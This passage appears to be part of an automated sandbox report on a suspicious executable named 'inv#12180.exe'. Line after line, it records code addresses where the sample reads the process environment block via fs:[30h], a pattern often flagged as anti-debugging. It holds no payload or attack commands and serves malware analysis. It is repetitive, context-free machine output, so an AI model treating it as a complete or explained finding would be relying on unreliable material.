              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015261C3 mov eax, dword ptr fs:[00000030h]0_2_015261C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE1D0 mov eax, dword ptr fs:[00000030h]0_2_014DE1D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE1D0 mov eax, dword ptr fs:[00000030h]0_2_014DE1D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE1D0 mov ecx, dword ptr fs:[00000030h]0_2_014DE1D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE1D0 mov eax, dword ptr fs:[00000030h]0_2_014DE1D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE1D0 mov eax, dword ptr fs:[00000030h]0_2_014DE1D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014901F8 mov eax, dword ptr fs:[00000030h]0_2_014901F8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015361E5 mov eax, dword ptr fs:[00000030h]0_2_015361E5
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A0185 mov eax, dword ptr fs:[00000030h]0_2_014A0185
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01504180 mov eax, dword ptr fs:[00000030h]0_2_01504180
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01504180 mov eax, dword ptr fs:[00000030h]0_2_01504180
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E019F mov eax, dword ptr fs:[00000030h]0_2_014E019F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E019F mov eax, dword ptr fs:[00000030h]0_2_014E019F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E019F mov eax, dword ptr fs:[00000030h]0_2_014E019F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E019F mov eax, dword ptr fs:[00000030h]0_2_014E019F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A197 mov eax, dword ptr fs:[00000030h]0_2_0145A197
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A197 mov eax, dword ptr fs:[00000030h]0_2_0145A197
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A197 mov eax, dword ptr fs:[00000030h]0_2_0145A197
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151C188 mov eax, dword ptr fs:[00000030h]0_2_0151C188
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151C188 mov eax, dword ptr fs:[00000030h]0_2_0151C188
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01462050 mov eax, dword ptr fs:[00000030h]0_2_01462050
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6050 mov eax, dword ptr fs:[00000030h]0_2_014E6050
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148C073 mov eax, dword ptr fs:[00000030h]0_2_0148C073
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E4000 mov ecx, dword ptr fs:[00000030h]0_2_014E4000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01502000 mov eax, dword ptr fs:[00000030h]0_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E016 mov eax, dword ptr fs:[00000030h]0_2_0147E016
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E016 mov eax, dword ptr fs:[00000030h]0_2_0147E016
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E016 mov eax, dword ptr fs:[00000030h]0_2_0147E016
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E016 mov eax, dword ptr fs:[00000030h]0_2_0147E016
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A020 mov eax, dword ptr fs:[00000030h]0_2_0145A020
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145C020 mov eax, dword ptr fs:[00000030h]0_2_0145C020
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6030 mov eax, dword ptr fs:[00000030h]0_2_014F6030
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E20DE mov eax, dword ptr fs:[00000030h]0_2_014E20DE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0145A0E3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E60E0 mov eax, dword ptr fs:[00000030h]0_2_014E60E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014680E9 mov eax, dword ptr fs:[00000030h]0_2_014680E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145C0F0 mov eax, dword ptr fs:[00000030h]0_2_0145C0F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A20F0 mov ecx, dword ptr fs:[00000030h]0_2_014A20F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146208A mov eax, dword ptr fs:[00000030h]0_2_0146208A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F80A8 mov eax, dword ptr fs:[00000030h]0_2_014F80A8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015260B8 mov eax, dword ptr fs:[00000030h]0_2_015260B8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015260B8 mov ecx, dword ptr fs:[00000030h]0_2_015260B8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152A352 mov eax, dword ptr fs:[00000030h]0_2_0152A352
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01508350 mov ecx, dword ptr fs:[00000030h]0_2_01508350
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E2349 mov eax, dword ptr fs:[00000030h]0_2_014E2349
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov eax, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov eax, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov eax, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov ecx, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov eax, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E035C mov eax, dword ptr fs:[00000030h]0_2_014E035C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150437C mov eax, dword ptr fs:[00000030h]0_2_0150437C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A30B mov eax, dword ptr fs:[00000030h]0_2_0149A30B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A30B mov eax, dword ptr fs:[00000030h]0_2_0149A30B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A30B mov eax, dword ptr fs:[00000030h]0_2_0149A30B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145C310 mov ecx, dword ptr fs:[00000030h]0_2_0145C310
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01480310 mov ecx, dword ptr fs:[00000030h]0_2_01480310
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015043D4 mov eax, dword ptr fs:[00000030h]0_2_015043D4
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015043D4 mov eax, dword ptr fs:[00000030h]0_2_015043D4
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014683C0 mov eax, dword ptr fs:[00000030h]0_2_014683C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014683C0 mov eax, dword ptr fs:[00000030h]0_2_014683C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014683C0 mov eax, dword ptr fs:[00000030h]0_2_014683C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014683C0 mov eax, dword ptr fs:[00000030h]0_2_014683C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A3C0 mov eax, dword ptr fs:[00000030h]0_2_0146A3C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E3DB mov eax, dword ptr fs:[00000030h]0_2_0150E3DB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E3DB mov eax, dword ptr fs:[00000030h]0_2_0150E3DB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E3DB mov ecx, dword ptr fs:[00000030h]0_2_0150E3DB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E3DB mov eax, dword ptr fs:[00000030h]0_2_0150E3DB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E63C0 mov eax, dword ptr fs:[00000030h]0_2_014E63C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151C3CD mov eax, dword ptr fs:[00000030h]0_2_0151C3CD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014703E9 mov eax, dword ptr fs:[00000030h]0_2_014703E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014963FF mov eax, dword ptr fs:[00000030h]0_2_014963FF
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E3F0 mov eax, dword ptr fs:[00000030h]0_2_0147E3F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E3F0 mov eax, dword ptr fs:[00000030h]0_2_0147E3F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E3F0 mov eax, dword ptr fs:[00000030h]0_2_0147E3F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148438F mov eax, dword ptr fs:[00000030h]0_2_0148438F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148438F mov eax, dword ptr fs:[00000030h]0_2_0148438F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E388 mov eax, dword ptr fs:[00000030h]0_2_0145E388
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E388 mov eax, dword ptr fs:[00000030h]0_2_0145E388
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E388 mov eax, dword ptr fs:[00000030h]0_2_0145E388
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01458397 mov eax, dword ptr fs:[00000030h]0_2_01458397
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01458397 mov eax, dword ptr fs:[00000030h]0_2_01458397
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01458397 mov eax, dword ptr fs:[00000030h]0_2_01458397
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151A250 mov eax, dword ptr fs:[00000030h]0_2_0151A250
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151A250 mov eax, dword ptr fs:[00000030h]0_2_0151A250
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E8243 mov eax, dword ptr fs:[00000030h]0_2_014E8243
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E8243 mov ecx, dword ptr fs:[00000030h]0_2_014E8243
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145A250 mov eax, dword ptr fs:[00000030h]0_2_0145A250
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466259 mov eax, dword ptr fs:[00000030h]0_2_01466259
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510274 mov eax, dword ptr fs:[00000030h]0_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464260 mov eax, dword ptr fs:[00000030h]0_2_01464260
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464260 mov eax, dword ptr fs:[00000030h]0_2_01464260
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464260 mov eax, dword ptr fs:[00000030h]0_2_01464260
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145826B mov eax, dword ptr fs:[00000030h]0_2_0145826B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145823B mov eax, dword ptr fs:[00000030h]0_2_0145823B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A2C3 mov eax, dword ptr fs:[00000030h]0_2_0146A2C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A2C3 mov eax, dword ptr fs:[00000030h]0_2_0146A2C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A2C3 mov eax, dword ptr fs:[00000030h]0_2_0146A2C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A2C3 mov eax, dword ptr fs:[00000030h]0_2_0146A2C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A2C3 mov eax, dword ptr fs:[00000030h]0_2_0146A2C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014702E1 mov eax, dword ptr fs:[00000030h]0_2_014702E1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014702E1 mov eax, dword ptr fs:[00000030h]0_2_014702E1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014702E1 mov eax, dword ptr fs:[00000030h]0_2_014702E1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E0283 mov eax, dword ptr fs:[00000030h]0_2_014E0283
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E0283 mov eax, dword ptr fs:[00000030h]0_2_014E0283
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E0283 mov eax, dword ptr fs:[00000030h]0_2_014E0283
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E284 mov eax, dword ptr fs:[00000030h]0_2_0149E284
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E284 mov eax, dword ptr fs:[00000030h]0_2_0149E284
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov eax, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov ecx, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov eax, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov eax, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov eax, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F62A0 mov eax, dword ptr fs:[00000030h]0_2_014F62A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468550 mov eax, dword ptr fs:[00000030h]0_2_01468550
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468550 mov eax, dword ptr fs:[00000030h]0_2_01468550
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149656A mov eax, dword ptr fs:[00000030h]0_2_0149656A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149656A mov eax, dword ptr fs:[00000030h]0_2_0149656A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149656A mov eax, dword ptr fs:[00000030h]0_2_0149656A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6500 mov eax, dword ptr fs:[00000030h]0_2_014F6500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534500 mov eax, dword ptr fs:[00000030h]0_2_01534500
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470535 mov eax, dword ptr fs:[00000030h]0_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E53E mov eax, dword ptr fs:[00000030h]0_2_0148E53E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E53E mov eax, dword ptr fs:[00000030h]0_2_0148E53E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E53E mov eax, dword ptr fs:[00000030h]0_2_0148E53E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E53E mov eax, dword ptr fs:[00000030h]0_2_0148E53E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E53E mov eax, dword ptr fs:[00000030h]0_2_0148E53E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E5CF mov eax, dword ptr fs:[00000030h]0_2_0149E5CF
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E5CF mov eax, dword ptr fs:[00000030h]0_2_0149E5CF
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014665D0 mov eax, dword ptr fs:[00000030h]0_2_014665D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A5D0 mov eax, dword ptr fs:[00000030h]0_2_0149A5D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A5D0 mov eax, dword ptr fs:[00000030h]0_2_0149A5D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C5ED mov eax, dword ptr fs:[00000030h]0_2_0149C5ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C5ED mov eax, dword ptr fs:[00000030h]0_2_0149C5ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014625E0 mov eax, dword ptr fs:[00000030h]0_2_014625E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E5E7 mov eax, dword ptr fs:[00000030h]0_2_0148E5E7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01494588 mov eax, dword ptr fs:[00000030h]0_2_01494588
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01462582 mov eax, dword ptr fs:[00000030h]0_2_01462582
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01462582 mov ecx, dword ptr fs:[00000030h]0_2_01462582
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E59C mov eax, dword ptr fs:[00000030h]0_2_0149E59C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E05A7 mov eax, dword ptr fs:[00000030h]0_2_014E05A7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E05A7 mov eax, dword ptr fs:[00000030h]0_2_014E05A7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E05A7 mov eax, dword ptr fs:[00000030h]0_2_014E05A7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014845B1 mov eax, dword ptr fs:[00000030h]0_2_014845B1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014845B1 mov eax, dword ptr fs:[00000030h]0_2_014845B1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151A456 mov eax, dword ptr fs:[00000030h]0_2_0151A456
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E443 mov eax, dword ptr fs:[00000030h]0_2_0149E443
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148245A mov eax, dword ptr fs:[00000030h]0_2_0148245A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145645D mov eax, dword ptr fs:[00000030h]0_2_0145645D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EC460 mov ecx, dword ptr fs:[00000030h]0_2_014EC460
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148A470 mov eax, dword ptr fs:[00000030h]0_2_0148A470
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148A470 mov eax, dword ptr fs:[00000030h]0_2_0148A470
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148A470 mov eax, dword ptr fs:[00000030h]0_2_0148A470
